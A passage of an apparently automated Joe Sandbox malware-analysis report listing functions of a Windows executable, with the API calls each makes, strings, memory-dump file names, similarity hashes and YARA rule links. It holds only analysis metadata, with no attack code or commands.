                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006595DF
                                                    • GetDlgCtrlID.USER32 ref: 006595EA
                                                    • GetParent.USER32 ref: 00659606
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00659609
                                                    • GetDlgCtrlID.USER32(?), ref: 00659612
                                                    • GetParent.USER32(?), ref: 0065962E
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00659631
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: 0126e7cd137d5883e35ee6a588040960e522da1d4a1121953eca233e4132105e
                                                    • Instruction ID: b4075742f31bbbfa01cb7875a79ab849fac62b840ac5af61118da10ddaa4f6b8
                                                    • Opcode Fuzzy Hash: 0126e7cd137d5883e35ee6a588040960e522da1d4a1121953eca233e4132105e
                                                    • Instruction Fuzzy Hash: CB21B375A40208BBDF05AB64CC85EFEBB7AEF49300F104219B911972E1EB75995DDB30
                                                    Function 00659645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32 ref: 00659651
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00659666
                                                    • _wcscmp.LIBCMT ref: 00659678
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006596F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-3381328864
                                                    • Opcode ID: 6ce9462dcc993b34f79b12fed9501fb3bf50bb53cc0fa330efae3caa4199a5b0
                                                    • Instruction ID: bd24718eb1a2bd39e2ba02c338a14e447618f925123bdf84e7f2b3ab4341f3e3
                                                    • Opcode Fuzzy Hash: 6ce9462dcc993b34f79b12fed9501fb3bf50bb53cc0fa330efae3caa4199a5b0
                                                    • Instruction Fuzzy Hash: 4B110A77288327FAFB112620EC0ADE6779F8B05361F20012BFE00A52D1FF5159594A78
                                                    Function 00664189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 0066419D
                                                    • __swprintf.LIBCMT ref: 006641AA
                                                      • Part of subcall function 006238D8: __woutput_l.LIBCMT ref: 00623931
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 006641D4
                                                    • LoadResource.KERNEL32(?,00000000), ref: 006641E0
                                                    • LockResource.KERNEL32(00000000), ref: 006641ED
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0066420D
                                                    • LoadResource.KERNEL32(?,00000000), ref: 0066421F
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0066422E
                                                    • LockResource.KERNEL32(?), ref: 0066423A
                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0066429B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                    • String ID:
                                                    • API String ID: 1433390588-0
                                                    • Opcode ID: 67dc386f637148efa6bf4b533594ab494c3a1b89eb62b4172c61f09334515f38
                                                    • Instruction ID: 8517468d7bb1184148399acc02251cd1294cf2237faa70aa00f3ed4db0c344f7
                                                    • Opcode Fuzzy Hash: 67dc386f637148efa6bf4b533594ab494c3a1b89eb62b4172c61f09334515f38
                                                    • Instruction Fuzzy Hash: 8A3190B160521ABFDB119FA0EC68EFF7BAEEF04301F104525F915D6250DB34DA618BA0
                                                    Function 006616DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00661700
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00660778,?,00000001), ref: 00661714
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0066171B
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660778,?,00000001), ref: 0066172A
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0066173C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660778,?,00000001), ref: 00661755
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660778,?,00000001), ref: 00661767
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00660778,?,00000001), ref: 006617AC
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00660778,?,00000001), ref: 006617C1
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00660778,?,00000001), ref: 006617CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: 7a0d95f404c168bc585b898ff1202efe40a27c587cf73894efbe491adb9aefec
                                                    • Instruction ID: 05388957f7194f9b228fb2e4a2e808709362329327ed18b4bdb144ab75f9d4b7
                                                    • Opcode Fuzzy Hash: 7a0d95f404c168bc585b898ff1202efe40a27c587cf73894efbe491adb9aefec
                                                    • Instruction Fuzzy Hash: 0731D075600208BFEB119F25EC88FB93BEBEB56711F185129F910CA3A0DB749D808F60
                                                    Function 00679428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: ,,i$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2862541840-316782094
                                                    • Opcode ID: 3eb237b3d0c8537fd43e30e432b69eed5ed1700d2c3aed57ff448966211307c4
                                                    • Instruction ID: b8e9c77adb9b62be8144f854dc21eeb1a49b91abeac5dd9b6f5c653c5c0cf5e0
                                                    • Opcode Fuzzy Hash: 3eb237b3d0c8537fd43e30e432b69eed5ed1700d2c3aed57ff448966211307c4
                                                    • Instruction Fuzzy Hash: A9917B71A00219ABEF24DFA5C844FEEBBFAEF45714F108259F519AB280D7709945CFA0
                                                    Function 0065A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumChildWindows.USER32(?,0065AA64), ref: 0065A9A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: 75066b047498793d45cf8e85cc4a8bb73f8324475d7402e5ca0f234ea0267091
                                                    • Instruction ID: 0b496424b802857e4567415b8512490f4b2f5d4cef0ba0ae882f4aabca34afb7
                                                    • Opcode Fuzzy Hash: 75066b047498793d45cf8e85cc4a8bb73f8324475d7402e5ca0f234ea0267091
                                                    • Instruction Fuzzy Hash: AA91A6709005169BDB48DFA0C481BE9FB77BF04305F10861DDD9AA7282DF30699ECBA5
                                                    Function 00602E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00602EAE
                                                      • Part of subcall function 00601DB3: GetClientRect.USER32(?,?), ref: 00601DDC
                                                      • Part of subcall function 00601DB3: GetWindowRect.USER32(?,?), ref: 00601E1D
                                                      • Part of subcall function 00601DB3: ScreenToClient.USER32(?,?), ref: 00601E45
                                                    • GetDC.USER32 ref: 0063CF82
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0063CF95
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0063CFA3
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0063CFB8
                                                    • ReleaseDC.USER32(?,00000000), ref: 0063CFC0
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0063D04B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: 08169c8c9d32e292cf613084887ee520b215fc394175aedc826e174af9703aa9
                                                    • Instruction ID: a5f1b6bfdfa5fb51573d16e6ecab31b66c567c308999f7c3f3286eff93a1116b
                                                    • Opcode Fuzzy Hash: 08169c8c9d32e292cf613084887ee520b215fc394175aedc826e174af9703aa9
                                                    • Instruction Fuzzy Hash: E171C330500205EFCF298F64D894AFA7BB7FF49364F14426AFD556A2A6C7318C52DBA0
                                                    Function 00678F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0068F910), ref: 0067903D
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0068F910), ref: 00679071
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006791EB
                                                    • SysFreeString.OLEAUT32(?), ref: 00679215
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: f97c49644d5203d8e207ed9986c77b48fc2b74d911a5eec75fffecc51c3c5369
                                                    • Instruction ID: 66beaf809199f6b5f781cd939fb2ae690409f95bbcf816faa16e5dac31d73465
                                                    • Opcode Fuzzy Hash: f97c49644d5203d8e207ed9986c77b48fc2b74d911a5eec75fffecc51c3c5369
                                                    • Instruction Fuzzy Hash: B9F1F971A00109EFDB04DF94C888EEEB7BAFF49315F108559F519AB291DB31AE46CB60
                                                    Function 0067F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0067F9C9
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067FB5C
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067FB80
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067FBC0
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067FBE2
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0067FD5E
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0067FD90
                                                    • CloseHandle.KERNEL32(?), ref: 0067FDBF
                                                    • CloseHandle.KERNEL32(?), ref: 0067FE36
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: 1049631df628240010388e0ee0ed110cd178a6c9ec94ac6ec4ba4ca913eaec14
                                                    • Instruction ID: b7bd2c6924eb6d264e1bfd64aabda4d0921b1309d2f6da33b943294619c7af1a
                                                    • Opcode Fuzzy Hash: 1049631df628240010388e0ee0ed110cd178a6c9ec94ac6ec4ba4ca913eaec14
                                                    • Instruction Fuzzy Hash: E1E19F31204241DFCB54EF24C891AABBBE2AF84314F14896DF8999B3A2DB31DC45CB56
                                                    Function 00664F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006638D3,?), ref: 006648C7
                                                      • Part of subcall function 006648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006638D3,?), ref: 006648E0
                                                      • Part of subcall function 00664CD3: GetFileAttributesW.KERNEL32(?,00663947), ref: 00664CD4
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00664FE2
                                                    • _wcscmp.LIBCMT ref: 00664FFC
                                                    • MoveFileW.KERNEL32(?,?), ref: 00665017
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    • Opcode ID: 33b71a2edbf6ed57dbde9c939c31b9b52be18d89212e190da123eff2b0f55dae
                                                    • Instruction ID: 629df6d3fac3ec25269aa590a3b12157c3ceb39df4c8ccae8080ced2f248daac
                                                    • Opcode Fuzzy Hash: 33b71a2edbf6ed57dbde9c939c31b9b52be18d89212e190da123eff2b0f55dae
                                                    • Instruction Fuzzy Hash: E65166B24087859BC764DB60DC819DFB3EDAF85340F00492EB186D3191EF74E6888B6A
                                                    Function 006888B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0068896E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 6311287de0d2c5920685e87257d0d6c9900b69f498fbc16a6d2b405e35d08468
                                                    • Instruction ID: 00e7914ca4f75c94fa5f245cd6230cefd5bb6e1e23bb6cde9686b8dd0772a35a
                                                    • Opcode Fuzzy Hash: 6311287de0d2c5920685e87257d0d6c9900b69f498fbc16a6d2b405e35d08468
                                                    • Instruction Fuzzy Hash: 35517170540209BEEF24AF28CC89BAA7B67AF05310FA04316F515E72E1DF71A9809B55
                                                    Function 00602B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0063C547
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0063C569
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0063C581
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0063C59F
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0063C5C0
                                                    • DestroyIcon.USER32(00000000), ref: 0063C5CF
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0063C5EC
                                                    • DestroyIcon.USER32(?), ref: 0063C5FB
                                                      • Part of subcall function 0068A71E: DeleteObject.GDI32(00000000), ref: 0068A757
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID:
                                                    • API String ID: 2819616528-0
                                                    • Opcode ID: 1304f74824cecde5f3f1d2b38f96454a92ccf14046494483c113654134b04598
                                                    • Instruction ID: ba6f9a85d34e44f3e7deeb17435140668d7bb7b801404126d635630e63ecf217
                                                    • Opcode Fuzzy Hash: 1304f74824cecde5f3f1d2b38f96454a92ccf14046494483c113654134b04598
                                                    • Instruction Fuzzy Hash: 4E514A74640205AFDB24DF24CC59FAB37A6EF54320F104629F902A72D0DB70ED91DBA0
                                                    Function 00659B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0065AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065AE77
                                                      • Part of subcall function 0065AE57: GetCurrentThreadId.KERNEL32 ref: 0065AE7E
                                                      • Part of subcall function 0065AE57: AttachThreadInput.USER32(00000000,?,00659B65,?,00000001), ref: 0065AE85
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00659B70
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00659B8D
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00659B90
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00659B99
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00659BB7
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00659BBA
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00659BC3
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00659BDA
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00659BDD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 3546a9c2c003482d13f1fe771fed4a7e56506810a507a9e3bd7b1dba7395b2f9
                                                    • Instruction ID: abd1aa60e892bfd2b020e140003f2f3ec4f3717b6f99e6592d2439601741bed8
                                                    • Opcode Fuzzy Hash: 3546a9c2c003482d13f1fe771fed4a7e56506810a507a9e3bd7b1dba7395b2f9
                                                    • Instruction Fuzzy Hash: 3311E571550218BEF7106B60DC8EF6A3B2EDB4C751F101629F644AB0A0C9F25C50DBA4
                                                    Function 00658E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00658A84,00000B00,?,?), ref: 00658E0C
                                                    • HeapAlloc.KERNEL32(00000000,?,00658A84,00000B00,?,?), ref: 00658E13
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00658A84,00000B00,?,?), ref: 00658E28
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00658A84,00000B00,?,?), ref: 00658E30
                                                    • DuplicateHandle.KERNEL32(00000000,?,00658A84,00000B00,?,?), ref: 00658E33
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00658A84,00000B00,?,?), ref: 00658E43
                                                    • GetCurrentProcess.KERNEL32(00658A84,00000000,?,00658A84,00000B00,?,?), ref: 00658E4B
                                                    • DuplicateHandle.KERNEL32(00000000,?,00658A84,00000B00,?,?), ref: 00658E4E
                                                    • CreateThread.KERNEL32(00000000,00000000,00658E74,00000000,00000000,00000000), ref: 00658E68
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
